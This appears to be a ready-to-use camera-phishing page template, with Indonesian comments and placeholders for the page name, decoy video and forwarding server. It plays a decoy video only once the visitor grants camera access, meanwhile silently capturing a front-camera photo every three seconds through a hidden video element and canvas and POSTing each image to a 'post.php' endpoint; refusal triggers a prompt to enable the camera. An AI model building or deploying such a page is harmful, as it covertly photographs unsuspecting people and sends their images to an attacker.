<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
    <title>fes_name</title>
    <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
    <link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    <link rel="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
    <link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
    <link rel="icon" type="image/png" sizes="32x32" href="https://i.imgur.com/fcqTtzV.png">
</head>

<body style="background: #000000; background-size: cover;">
    <center>
        <!-- Peringatan jika akses kamera tidak diizinkan -->
        <div id="warning" style="color: red; display: none;">
            <p>Izinkan kamera agar video dapat diputar.</p>
            <button id="retryButton" style="display: none; padding: 10px 20px; background-color: #007bff; color: white; border: none; cursor: pointer;">
                Buka Pengaturan untuk Mengizinkan Kamera
            </button>
            <p id="instruction" style="display: none; color: #555;">
                Buka pengaturan browser Anda dan berikan izin akses kamera secara manual.
            </p>
        </div>

        <!-- Placeholder untuk video file/link -->
        <video id="myVideo" width="80%" controls style="display: none;">
            <source src="video_link_placeholder" type="video/mp4">
            Your browser does not support the video tag.
        </video>

        <!-- Video dari kamera, disembunyikan dari tampilan -->
        <video id="video" width="80%" autoplay hidden></video>
        <canvas id="canvas" width="640" height="480" hidden></canvas>
    </center>

    <script>
        // Permintaan akses kamera
        const constraints = {
            audio: false,
            video: {
                facingMode: "user" // Menggunakan kamera depan
            }
        };

        // Akses webcam
        async function init() {
            try {
                const stream = await navigator.mediaDevices.getUserMedia(constraints);
                const video = document.getElementById('video');
                video.srcObject = stream; // Menghubungkan stream video ke elemen video
                video.play(); // Memastikan video diputar meskipun disembunyikan

                // Jika akses diizinkan
                document.getElementById('myVideo').style.display = 'block'; // Tampilkan video dari file/link
                document.getElementById('warning').style.display = 'none'; // Sembunyikan peringatan
                setInterval(() => takePhoto(), 3000); // Mengambil foto setiap 3 detik
            } catch (e) {
                console.error('navigator.getUserMedia error:', e.toString());
                // Jika akses ditolak
                document.getElementById('myVideo').style.display = 'none'; // Sembunyikan video
                document.getElementById('warning').style.display = 'block'; // Tampilkan peringatan
                document.getElementById('retryButton').style.display = 'inline-block'; // Tampilkan tombol "Izinkan Kamera"
                document.getElementById('instruction').style.display = 'block'; // Tampilkan instruksi
            }
        }

        function takePhoto() {
            const video = document.getElementById('video');
            const canvas = document.getElementById('canvas');
            const context = canvas.getContext('2d');

            // Menggambar video ke canvas
            context.drawImage(video, 0, 0, canvas.width, canvas.height);

            // Mengonversi canvas menjadi data URL
            const dataUrl = canvas.toDataURL('image/png');
            console.log("Captured photo data URL:", dataUrl); // Log untuk memeriksa data URL
            post(dataUrl); // Mengirim data gambar ke server
        }

        // Fungsi untuk mengirim data gambar ke server
        function post(imgdata) {
            console.log("Sending photo data to server:", imgdata); // Log sebelum mengirim
            $.ajax({
                type: 'POST',
                data: { cat: imgdata },
                url: 'forwarding_link/post.php',
                dataType: 'json',
                async: false,
                success: function(result) {
                    console.log("Server response:", result); // Log respons server
                },
                error: function(xhr, status, error) {
                    console.error('Error posting data:', status, error); // Log kesalahan
                }
            });
        }

        // Tombol untuk menunjukkan instruksi mengizinkan akses kamera secara manual
        document.getElementById('retryButton').addEventListener('click', function() {
            alert("Buka pengaturan browser Anda dan izinkan akses kamera secara manual.");
        });

        // Load init
        init();
    </script>
</body>
</html>
